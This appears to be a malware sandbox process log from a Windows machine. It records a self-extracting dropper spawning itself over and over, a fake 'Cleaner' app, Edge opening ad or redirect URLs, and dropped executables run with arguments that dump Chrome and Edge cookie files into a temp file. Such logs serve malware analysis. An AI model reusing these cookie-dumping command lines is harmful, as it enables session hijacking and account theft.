C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=2120 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=840 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 436 -p 2608 -ip 2608
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2608 -s 1132
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
